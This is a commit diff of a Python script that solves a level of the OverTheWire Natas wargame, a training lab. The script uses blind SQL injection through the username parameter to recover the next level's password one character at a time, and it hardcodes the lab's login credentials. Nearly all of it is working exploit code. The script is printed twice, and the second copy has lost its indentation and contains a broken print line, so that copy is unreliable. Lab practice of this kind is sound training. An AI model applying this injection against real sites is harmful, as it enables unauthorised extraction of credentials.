Manoj-nathwani · March 17, 2016 20:19
diff --git a/Natas15.py b/Natas15.py
 # coding=utf-8
 import requests, base64, ipdb
 from bs4 import BeautifulSoup

 username = 'natas15:'.encode()
 password = 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'.encode()
 url = 'http://natas15.natas.labs.overthewire.org'
 chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
 existsStr = 'This user exists.'.encode()
 parsedChars = ''
 next_level_password = ''


 def connect():
    global response
    global headers
    base_encoded_auth = base64.b64encode(username + password).decode('utf-8')
    print(base_encoded_auth)  # bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==
    headers = {'Authorization': 'Basic {0}'.format(base_encoded_auth)}
    response = requests.get(url, headers=headers)
    # ipdb.set_trace()

 def select_chars():
    global parsedChars, next_level_password
    if response.status_code != requests.codes.ok:
        print('Can\'t connect')
    else:
        print('success')
    for char in chars:
        r = requests.get(url + '?username=natas16" AND password LIKE BINARY "%' + char + '%" "', headers=headers)
        # print(r.text)
        html_response_parser = BeautifulSoup(r.content, 'html.parser')  # .get_text
        # ipdb.set_trace()
        # next required to read div content for some reason
        if existsStr in html_response_parser.find("div", {"id": "content"}).next.encode():
            parsedChars += char

 print('Characters Used: ' + parsedChars + ' Starting brute force...')

 def brute_force():
    global next_level_password
    # Assuming password is 32 characters long
    for i in range(32):
        for char in parsedChars:
            req = requests.get(
                url + '?username=natas16" AND password LIKE BINARY "' + next_level_password + char + '%" "',
                headers=headers)
            html_response_parser2 = BeautifulSoup(req.content, 'html.parser')  # .get_text
            if existsStr in html_response_parser2.find("div", {"id": "content"}).next.encode():
                next_level_password += char
                print('Password: ' + next_level_password + '*' * int(32 - len(next_level_password)))
                break

 connect()
 select_chars()
 brute_force()
	# coding=utf-8
	import requests, base64, ipdb
	from bs4 import BeautifulSoup

	username = 'natas15:'.encode()
	password = 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'.encode()
	url = 'http://natas15.natas.labs.overthewire.org'
	chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
	existsStr = 'This user exists.'.encode()
	parsedChars = ''
	next_level_password = ''


	def connect():
	global response
	global headers
	base_encoded_auth = base64.b64encode(username + password).decode('utf-8')
	print(base_encoded_auth) # bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==
	headers = {'Authorization': 'Basic {0}'.format(base_encoded_auth)}
	response = requests.get(url, headers=headers)
	# ipdb.set_trace()

	def select_chars():
	global parsedChars, next_level_password
	if response.status_code != requests.codes.ok:
	print('Can\'t connect')
	else:
	print('success')
	for char in chars:
	r = requests.get(url + '?username=natas16" AND password LIKE BINARY "%' + char + '%" "', headers=headers)
	# print(r.text)
	html_response_parser = BeautifulSoup(r.content, 'html.parser') # .get_text
	# ipdb.set_trace()
	# next required to read div content for some reason
	if existsStr in html_response_parser.find("div", {"id": "content"}).next.encode():
	parsedChars += char

	print('Characters Used: ' + parsedChars + ' Starting brute force...')

	def brute_force():
	global next_level_password
	# Assuming password is 32 characters long
	for i in range(32):
	for char in parsedChars:
	req = requests.get(
	url + '?username=natas16" AND password LIKE BINARY "' + next_level_password + char + '%" "',
	headers=headers)
	html_response_parser2 = BeautifulSoup(req.content, 'html.parser') # .get_text
	if existsStr in html_response_parser2.find("div", {"id": "content"}).next.encode():
	next_level_password += char
	print('Password: ' + next_level_password + '' int(32 - len(next_level_password)))
	break

	connect()
	select_chars()
	brute_force()